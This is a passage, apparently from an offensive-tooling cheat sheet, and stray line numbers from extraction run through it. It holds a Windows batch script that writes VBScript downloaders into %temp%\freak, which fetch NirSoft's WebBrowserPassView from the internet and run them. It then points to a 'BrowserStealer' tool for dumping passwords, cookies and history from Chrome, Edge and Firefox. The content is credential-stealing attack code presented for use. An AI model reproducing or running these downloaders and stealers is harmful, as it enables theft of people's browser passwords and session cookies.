100
    %temp%\freak\opera.vbs
101
    echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
102
    strHDLocation >> %temp%\freak\opera.vbs
103
    echo Set objFSO = Nothing >> %temp%\freak\opera.vbs
104
    echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\opera.vbs
    echo objADOStream.Close >> %temp%\freak\opera.vbs
106
    echo Set objADOStream = Nothing >> %temp%\freak\opera.vbs
    echo End if >> %temp%\freak\opera.vbs
107
    echo Set objXMLHTTP = Nothing >> %temp%\freak\opera.vbs
108
109
    call %temp%\freak\opera.vbs
110
     ::Download All:
     echo strFileURL = "http://nirsoft.net/utils/webbrowserpassview.zip" >
     %temp%\freak\all.vbs
     echo strHDLocation = "%temp%\freak\webbrowserpassview.zip" >>
     %temp%\freak\all.vbs
     %temp%\freak\all.vbs
     echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\all.vbs
     echo objXMLHTTP.send() >> %temp%\freak\all.vbs
     echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\all.vbs
     echo Set objADOStream = CreateObject("ADODB.Stream") >>
     %temp%\freak\all.vbs
     echo objADOStream.Open >> %temp%\freak\all.vbs
    echo objADOStream.Type = 1 >> %temp%\freak\all.vbs
     echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\all.vbs
     echo objADOStream.Position = 0 >> %temp%\freak\all.vbs
     echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
     %temp%\freak\all.vbs
     echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
     strHDLocation >> %temp%\freak\all.vbs
```

```
echo Set objFSO = Nothing >> %temp%\freak\all.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\all.vbs
echo objADOStream.Close >> %temp%\freak\all.vbs
echo Set objADOStream = Nothing >> %temp%\freak\all.vbs
echo End if >> %temp%\freak\all.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\all.vbs
call %temp%\freak\all.vbs
```

#### **BrowserStealer**

https://github.com/SaulBerrenson/BrowserStealer

Simple password/cookies/history/bookmarks stealer/dumper for chrome all version (includes 80+), microsoft edge browser,includes all chromium based browsers, and all gecko based browser (firefox etc.).

1 BrowserCollector.exe

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